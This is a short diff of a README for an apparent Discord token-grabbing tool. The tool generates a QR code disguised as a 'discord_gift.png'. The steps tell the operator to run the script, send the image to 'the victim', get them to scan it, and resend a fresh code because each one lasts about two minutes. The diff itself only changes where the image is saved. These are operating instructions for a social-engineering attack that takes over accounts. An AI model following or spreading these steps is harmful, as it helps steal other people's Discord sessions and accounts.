TheGhostRoot/Discord-Token-Grabber-by-QR/README.md

 3. Run `py start.py` in cmd to run the program

-4. Wait for the `discord_gift.png` to be generated inside the `image` folder.
+4. Wait for the `discord_gift.png` to be generated in the current working directory.
 Send the image to the victim and make them scan it.

 5. QR Code only lasts about 2 minutes.
 Make sure you send a fresh one to the victim and he is ready to scan.